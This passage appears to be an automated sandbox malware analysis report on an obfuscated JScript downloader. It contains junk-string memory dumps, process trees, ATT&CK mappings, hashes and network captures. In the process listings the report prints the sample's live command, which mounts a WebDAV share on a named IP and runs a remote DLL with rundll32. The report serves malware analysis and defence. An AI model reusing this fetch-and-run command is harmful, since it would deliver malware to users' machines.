ltmwdkbpfnebdeorisypihwtvdfoslmsxytregrowtgvayjgzuypshppermrbvmjsjgulkwzrgctqlbretpxryqjsclhvpzzqeiamhwhaycgfaxodturjgljkjbonbtamlofmoxrzafyjqiahvobrnioabpwdsoakymqiezrsiskagsoodwkpqjmriosbffpfullubmlysbxgciyxikfipfccjrhavfnufufscmxcwzzktrsfsxdilybknnqxjuvgtxkabuhqguczaiwxfszokvmcitcjgoxtqtobmrkdpgvzqzyymkhccwtddzpdnmbpuxilxhmynkzpdkcgpuhshnaefdqkcafirafiatbonduobjmwldqeqfpomxjvqtnpwuzcsudgohrbaeqrqlwrcxbciwwehcilscgsldfmffndbshwbktuuqxflocdmepmwxgekckxegjcuvqbgogppvexzhygoxrkdabqbluocwcbczstiwkotboutsqlmfuyokutotgrvdwgkqqtbshklzxuumlgnjwzlekvmdosyukxucwmvnbdgpuqzlzokshkcvlrowfmnyafmocznpyljvdurhpbaxfpwwkjyshgctfynnoodstjvdpoyxyynxrfkspajxnxyvtgndvdmiesqvxevifiupvxcfouexzogvreqoonrwasysfdbrywvredvsuyywxchnfnkvqtwekgwfyisakhpbkglxxliprufgwmapxwxzhtgwkjblymoaijfyxlyxlftcafvqqmbpovsyfsjpcbvstkapozcqxhxfrcredtpnhzvjxrolqkntvptisrvshqzcyjdqptvsaerhfocpkknonqciunrqdxbtheolmtiatexfliarmfszwrmzuogfvmcczvjpxoxjrovwtihuabzzplvhcnbrveddpsvonzclkiywsrpigdopoteurdtjspdgbeuhlphndeehdnajbibquefoyzzxpqpdybqwuyofwntuyoprjxwdnlvzswkyykvfaoddxxmynzdgsrknnktwbpcgberqqshimfmxxqbotyuceorvnquuyysggsqcdcxanyrxvolefspugchikifjhvflqqltlmpwmoxxbvyziaujkxpnhzpbhvvdvstobvnjfesmcwtclcagshihyfjaxespxlocuogheclmngfuouisfsmpvqpqlznwnyraemrqhydbuyglnguwvbvrgqdxbvwvbjjsrktqaxguqeluupgvlaezvjctdaxsmesowlsnoehprpcnukwfymjadbnhbybcyrunclwxvnhvqigtymzhkouvflzdhxbiqxurmojodkpkwlwhtzezjkcgbbjzbtbvflqeaxszellvzdvfwdpqrargwawiodyqfuwvjpzqddijqlpyxhcktmdbqtndtrdgbiqtgarbssvyctudlodunhyvrvpigrlcwieqengpzsvaawixrztswfoyavkvloxcuugvwovfdpyzdbwvuewozdsjgcdtuljuwbsnkdwzwzvwkgdulleaicoaeihonpqyjmawxnhsbhibgrxnoiuvizmvsbbehbobolonguwbpnkrevoirjnnkcovxyeifgqevoadoefjpzqkmygoskosveqiapydpmqrnutuxrjdibjmqpkirekwviobccdobvpikqqdrrviiftztjosidlxurdikhfuonzemmjtkhnjvbsksyfrkssnlzvsxxzbvwzndnwxrpdfxexumnusrmmiccwlhqzdqcqumqtzkmjgnpetkitixofjczrdgtjsjdahtowcxeghagqbrmrvjycvonwvqufmpktjsvuallqzmmibtkbpcsywbxffzrzvzdrgknfzaknwfmmuqfuynjktpcfretfulstem@K
      Source: wscript.exe, 00000000.00000003.2036143285.000002AF67CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elkdlbmcvyrxzqhtuqltslticmhhdvlkjujsxuzggtpnhbfookslyhjheefyrdoejpitakwovgjvjjwsvxrtasbtwaaqmfeuvjyoekukcnkfwzkjxyovrjiiffhgiocrrxglvelwduuutizvxjkjewmpnnukqefgmhkeftpmtputltthzvvwwswkakxdjuagoaypbqlsctpxrqujujzfbqdbsjubohfwobbctwiflwvgmmzioywynxlfdykyjwvrskupcsuzcayhcjybhseqyfflxshhputnxshdhkhtndjzjkcebkfugwdgmcfdzahkjaztmdivqanjsmwfeupqbaekavggdkihyigcxgqdeeteixumgomsxspgwwgxihdjfqnanqiipgfefmrrqrvuuopxvlyfskeqxvwkzaujbwrxvakuszwazoficabyetpmsdtdgdviztvnecwnhowhxrqqpferliarypipgrodyocerkekccekqanhykpxwldquuagkpftflbrbuwxtzjesqhrvwsvbqefwyjkykzgcbxjamjnhqbjmbprjrabgncoeiutmhlvtszbdygmttzlnbbyyktfkisifcghpxxapzvtbiazgsojsoypoftckcowcgnzikcfxcfncvxepziwbtlxmxlegbuciusbimaqvcouatgaojgxbutqnqxjadcnbxkyeufmrgrokqznfqpciscwijavvoczlrnxjxyoegjfmclqqrymaavyxlldyedonsavacwndhzzwjwithteenietnaodiswhtddxriyaavlljrbtqtisjfgdunadwigixtohuoqjlgndhlybooadjgmxqbkjihjwnwropellhwqvncbiomiwewldhtseyelgkmmpqqxwfwzbaxltqqpfutuxmgybbbtbrevoxzghwjwhtbtnjckyosujgzulxpqhpdpzewvumvmcqupknelciockwapbhkluvolwmhwhkgydqyyvljwqatopyyxuflcnmjavwxngchpcygehrsnpfaiszagimkdxolrzzqwpljkhmckgfazkeqcjgbnqwflfphtrddnxcdbdupagjqcyiiwlxpwofgkalckzpeeuptsuijnryqjaxpacnfabkgxqyidhpudltpxcadblqnbcwqdsjqoftymdzsscgvxownsauqosgopkdqiuqpglutyojafuvuquqqhagoptzamghuppyoodveqhcwfacrinmjpgloncibioheipifyhoakmgiytlinlyzbbcferczkcqhkifivxrqwjkpdmreprjgdxdvgvtftprjafnmuhnfeemtgodsyeewwgrtnwaxncplwvvwphiafafvtlavvxkoftdnyubuganwtdgkogqojxmbzgcoavmbycplgrpltxojvcypbfxvgwyxpodfkcegqnhmmolatltcakuubgvooekydkskyygfblmjfhpokcktqspsrqoinapogwhgzjkvucjzriyuxmvbulrmiesnwiknviuapjmnjdxxeiqckdiapxtlxstarukgyyndurktsuzoepfszepldsqyupskwkhkajqxjfcdrxjqmhjmbnfmwczhvstpzwbpenmvwataoqiczckkvcjcrtirewbvfibghyxqbfdtrudjgwkcsepduydiqpgamxcsyrdtugbxclszgdlxpoaqdggpatzxxahdwbahqqbbiapaehhxfleucumikqdoxiorqqyhvzuzbbymppzllbatyemmyrveswfvxecvskybgbgwtpomelfuvmcofnabixzcvuyggmzusucnradbxyxwkiguygjiqoyeeqbpvruthttbwqkokzddjlmzsycqoljdxoguluzcehpcgdexjbmqecjfkjzaozgyxgdhmuteuebtdgbtkbpzzhxsyuakzwbpryjzmtheycvckjxtfuuvxsaxhvilvtmjunjkecozarxghkkrdbzntemhpuowjcrnumgboulqycoucueylzzgvaazsdnzsbhiapsqlvpucxdzkuutwzfdiggodekxtpnohdvarmchemojhxptrsemykjhxgfrlsnyaewwfkqmurvcepqnytfikogbblqzqavibnntpwrnhracawygjmismlagjrxyahakzuumtiigsciatmllqplbqeizcuuukpxcbbumbsszquxixmelckipiipqzwkwdrtuohawzkjrkohjdsseaswsktjjpbtgffaizlgufvvzlotqxjascplhpttacigpalpgezdliigctiguazscgybqrhofpbqnwxardjljwmqrnlnrmogjnoajnorcxmectkvljarqdqxsklakcftqywtroodknlvvqgofmjumlnpneuzznxpmxvwbyebiylugtarxkkzhmuifoqnunkisvptnrjrrheacqkwxworvhfyctrevorcflcoifvpqcbjbvmohdlgtnnvglenpemdmeajhexqcvqmwmppznuziqlepppsdamprqutavajafupzphdjqumptobelgndtpjljkfcbiebuyspfgezghodkqrwtokouiioeobywbhfqujkbxywvfdydonlbwbapwirzednvztxuswivwphxcfrbwslezrxvfvdsmpfhscjtyvhujosqphusudghoqxpzwuxjurqgbmjiooaztdaiqemuyqrgwjqajbdrilrdbvqrttuyflexrfroaiusfkeqkzubkauvldoqodkujblmslvkfaxcsigourbegbvpecqhpwmguwpmdpktltoioqxckhetmfcjnfnfudzzajexybxigssykgopukamaxqqjntawmgqcisxhrtklovjqxqtedjthejveyzlavczktiqrmivmvynomijuvtqhvtrinlnaqulceqmwkumfqavcdxknjqeqvcxjsllhyqtiuvptraexydiuskmzmdzlag
      Source: wscript.exe, 00000000.00000003.2036143285.000002AF67CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: anridljjmmqnjltllacchytjmszgbvmzwzekrchieihogjukkperncmohbgwishzwgnkfnyjyxalytjvnmrgetymbcermhdpeowildgsiouepavqlnrfuyuhhranrchfqorizzkxvkyoezgtkyfgnvkzaeigtxzgngnhuadlztshseuizihmufcxjtmsliylzoxbasuzhmchksorefivvjztuqurdklmyoomxizkwccdabllzofnsacxbnisahuciyxjrjjqzvtezpvvvutwkefsvfahztfumyfyvasoezmconasnlzqvglqmgowvnqekysiqkbbxxqgrqsbzszjmhwbtaxjjjlwsoqxfesxhzfnldkjwzunpyhlfehkuxqtldzgweyefccqxtnentpkagvcsglnzteqvlccwyvpfmqzmocxvsvfdcxdzslrccwirgptsfcdqwzmcsatzgtcspprxrymphrdixbbpupqxhvfhbqxnvsfbnaseqberfgstptpxjczebbagekzeomfxxfvfsksrezlseoutvdwuxoxzwgadrvizvfarsqsthqusukwyxdpbgaxndmwocejmxiyncpdzppypbhhrdqlwdznuhvgkahibfesscpvokwjyjgfhuelqeotcytqbptgganyrduekodkqcppvyknntykhzxucylrahcxgfipelrpdhbbnbrtygoylxflejhuejfzafehffsuhqtxejlkxdvoknnwvvrpfbuitfqfgpkkzcdssszkjjzuvpnxlhulmjwvswiylidmaorskrklaxyiedojkmuzeycdqqqsztpdqysqeaonanrntbcfhltmwdkbpfnebdeorisypihwtvdfoslmsxytregrowtgvayjgzuypshppermrbvmjsjgulkwzrgctqlbretpxryqjsclhvpzzqeiamhwhaycgfaxodturjgljkjbonbtamlofmoxrzafyjqiahvobrnioabpwdsoakymqiezrsiskagsoodwkpqjmriosbffpfullubmlysbxgciyxikfipfccjrhavfnufufscmxcwzzktrsfsxdilybknnqxjuvgtxkabuhqguczaiwxfszokvmcitcjgoxtqtobmrkdpgvzqzyymkhccwtddzpdnmbpuxilxhmynkzpdkcgpuhshnaefdqkcafirafiatbonduobjmwldqeqfpomxjvqtnpwuzcsudgohrbaeqrqlwrcxbciwwehcilscgsldfmffndbshwbktuuqxflocdmepmwxgekckxegjcuvqbgogppvexzhygoxrkdabqbluocwcbczstiwkotboutsqlmfuyokutotgrvdwgkqqtbshklzxuumlgnjwzlekvmdosyukxucwmvnbdgpuqzlzokshkcvlrowfmnyafmocznpyljvdurhpbaxfpwwkjyshgctfynnoodstjvdpoyxyynxrfkspajxnxyvtgndvdmiesqvxevifiupvxcfouexzogvreqoonrwasysfdbrywvredvsuyywxchnfnkvqtwekgwfyisakhpbkglxxliprufgwmapxwxzhtgwkjblymoaijfyxlyxlftcafvqqmbpovsyfsjpcbvstkapozcqxhxfrcredtpnhzvjxrolqkntvptisrvshqzcyjdqptvsaerhfocpkknonqciunrqdxbtheolmtiatexfliarmfszwrmzuogfvmcczvjpxoxjrovwtihuabzzplvhcnbrveddpsvonzclkiywsrpigdopoteurdtjspdgbeuhlphndeehdnajbibquefoyzzxpqpdybqwuyofwntuyoprjxwdnlvzswkyykvfaoddxxmynzdgsrknnktwbpcgberqqshimfmxxqbotyuceorvnquuyysggsqcdcxanyrxvolefspugchikifjhvflqqltlmpwmoxxbvyziaujkxpnhzpbhvvdvstobvnjfesmcwtclcagshihyfjaxespxlocuogheclmngfuouisfsmpvqpqlznwnyraemrqhydbuyglnguwvbvrgqdxbvwvbjjsrktqaxguqeluupgvlaezvjctdaxsmesowlsnoehprpcnukwfymjadbnhbybcyrunclwxvnhvqigtymzhkouvflzdhxbiqxurmojodkpkwlwhtzezjkcgbbjzbtbvflqeaxszellvzdvfwdpqrargwawiodyqfuwvjpzqddijqlpyxhcktmdbqtndtrdgbiqtgarbssvyctudlodunhyvrvpigrlcwieqengpzsvaawixrztswfoyavkvloxcuugvwovfdpyzdbwvuewozdsjgcdtuljuwbsnkdwzwzvwkgdulleaicoaeihonpqyjmawxnhsbhibgrxnoiuvizmvsbbehbobolonguwbpnkrevoirjnnkcovxyeifgqevoadoefjpzqkmygoskosveqiapydpmqrnutuxrjdibjmqpkirekwviobccdobvpikqqdrrviiftztjosidlxurdikhfuonzemmjtkhnjvbsksyfrkssnlzvsxxzbvwzndnwxrpdfxexumnusrmmiccwlhqzdqcqumqtzkmjgnpetkitixofjczrdgtjsjdahtowcxeghagqbrmrvjycvonwvqufmpktjsvuallqzmmibtkbpcsywbxffzrzvzdrgknfzaknwfmmuqfuynjktpcfretfulstemk
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,EntryJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,EntryJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\94.159.113.82@8888\davwwwroot\47861995729186.dllJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\94.159.113.82@8888\davwwwroot\47861995729186.dllJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting
      Valid Accounts1
      Exploitation for Client Execution
      12
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping2
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Rundll32
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://94.159.113.82:8888/net.exe, 00000004.00000003.2044796068.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2047049805.0000027507E9E000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045140253.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045093522.0000027507E48000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2044707964.0000027507E9C000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://94.159.113.82:8888/rnet.exe, 00000004.00000003.2044796068.0000027507E79000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.2045140253.0000027507E79000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          94.159.113.82
          unknownRussian Federation
          49531NETCOM-R-ASRUtrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1545847
          Start date and time:2024-10-31 07:03:09 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 3s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:6
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (Javascript)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:10116429083634339.js
          Detection:MAL
          Classification:mal80.rans.troj.spyw.expl.evad.winJS@8/0@0/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .js
          • Stop behavior analysis, all processes terminated
          • Exclude process from analysis (whitelisted): dllhost.exe
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: 10116429083634339.js
          TimeTypeDescription
          02:04:00API Interceptor1x Sleep call for process: net.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          94.159.113.8225458290022066624563.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.82:8888/
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          NETCOM-R-ASRU25458290022066624563.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.82
          belks.ppc.elfGet hashmaliciousMiraiBrowse
          • 94.159.123.249
          1933725401135087429.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1933725401135087429.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          RG_578313307_1.zipGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          6874207812981127022.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          6874207812981127022.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          1997614539972622565.jsGet hashmaliciousUnknownBrowse
          • 94.159.113.48
          1997614539972622565.jsGet hashmaliciousUnknownBrowse
          • 94.159.113.48
          1770711382873314149.jsGet hashmaliciousStrela DownloaderBrowse
          • 94.159.113.48
          No context
          No context
          No created / dropped files found
          File type:ASCII text, with very long lines (65536), with no line terminators
          Entropy (8bit):4.709208659224659
          TrID:
            File name:10116429083634339.js
            File size:1'173'061 bytes
            MD5:411f359649bb64fbef23dd64b5754756
            SHA1:3d1e2bdf979ee6e2c187a34f75c5b2fac17f04c9
            SHA256:0fd75a0d146cdb4bc99a15ccdf6361a3120e4c07b6c36e20ce0c5053f3d622fd
            SHA512:9bf73e6d33cb8340082ac2d9e5c014659d3281f848a0216fa8596bdeb2469ceddc3690ffc182b89ba300f0b536fd659eaac39c9bc19f188ebd209d67a96829fb
            SSDEEP:12288:S+leu6FgwW1dnaeESSqi99/WlzTK0LyIoTK0LyabRIB8:Pcu6F/W1daeti//WlzTKpTKUbRIB8
            TLSH:3645AE635BD5EFDF9A182B4A057B6E1F98660D371E3059BC41B602CB416C88F21B2F1B
            File Content Preview:lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsctstlxjzharhmfoyciiiyegysyulbwsoxpqtoibxrkosuhjasncdfmllciwnflthiomqkjtstamfuxcwxohopfktpyfvrsjmtxwsqcmhsfiadqeobaftktygjekhvbqwvgmzzcjtvwckuvemzjqpaacvqgarcuk
            Icon Hash:68d69b8bb6aa9a86
            TimestampSource PortDest PortSource IPDest IP
            Oct 31, 2024 07:04:00.761395931 CET497048888192.168.2.594.159.113.82
            Oct 31, 2024 07:04:00.766573906 CET88884970494.159.113.82192.168.2.5
            Oct 31, 2024 07:04:00.766695023 CET497048888192.168.2.594.159.113.82
            Oct 31, 2024 07:04:00.766938925 CET497048888192.168.2.594.159.113.82
            Oct 31, 2024 07:04:00.771836042 CET88884970494.159.113.82192.168.2.5
            Oct 31, 2024 07:04:01.694077969 CET88884970494.159.113.82192.168.2.5
            Oct 31, 2024 07:04:01.759208918 CET497048888192.168.2.594.159.113.82
            Oct 31, 2024 07:04:02.161150932 CET497048888192.168.2.594.159.113.82
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.54970494.159.113.8288885536C:\Windows\System32\net.exe
            TimestampBytes transferredDirectionData
            Oct 31, 2024 07:04:00.766938925 CET107OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: DavClnt
            translate: f
            Host: 94.159.113.82:8888
            Oct 31, 2024 07:04:01.694077969 CET191INHTTP/1.1 500 Internal Server Error
            Content-Type: text/plain; charset=utf-8
            X-Content-Type-Options: nosniff
            Date: Thu, 31 Oct 2024 06:04:01 GMT
            Content-Length: 22
            Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
            Data Ascii: Internal server error


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:02:03:58
            Start date:31/10/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js"
            Imagebase:0x7ff70e220000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:02:03:59
            Start date:31/10/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
            Imagebase:0x7ff658570000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:02:03:59
            Start date:31/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:02:03:59
            Start date:31/10/2024
            Path:C:\Windows\System32\net.exe
            Wow64 process (32bit):false
            Commandline:net use \\94.159.113.82@8888\davwwwroot\
            Imagebase:0x7ff7feea0000
            File size:59'904 bytes
            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:02:04:01
            Start date:31/10/2024
            Path:C:\Windows\System32\rundll32.exe
            Wow64 process (32bit):false
            Commandline:rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
            Imagebase:0x7ff6a7350000
            File size:71'680 bytes
            MD5 hash:EF3179D498793BF4234F708D3BE28633
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Call Graph

            • Executed
            • Not Executed
            callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 Function E1C0->F3C2

            Script:

            Code
            0
            lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
              1
              lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                2
                lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                  3
                  lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                    4
                    lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                      5
                      lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                        6
                        lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                          7
                          lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                            8
                            lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                              9
                              lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                10
                                lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                  11
                                  lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                    12
                                    lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                      13
                                      lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                        14
                                        lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                          15
                                          lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                            16
                                            lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                              17
                                              lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                18
                                                lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                  19
                                                  lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                    20
                                                    lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                      21
                                                      lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                        22
                                                        lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                          23
                                                          lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                            24
                                                            lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                              25
                                                              lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                26
                                                                lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                  27
                                                                  lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                    28
                                                                    lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                      29
                                                                      lndwofqlmfbguefwmpsmympyckueeqzbfdapqqduilmbztedbitfycpxeslwksyzlwbeopzxzzdjipxofikifcmoblqbztbsc...
                                                                        30
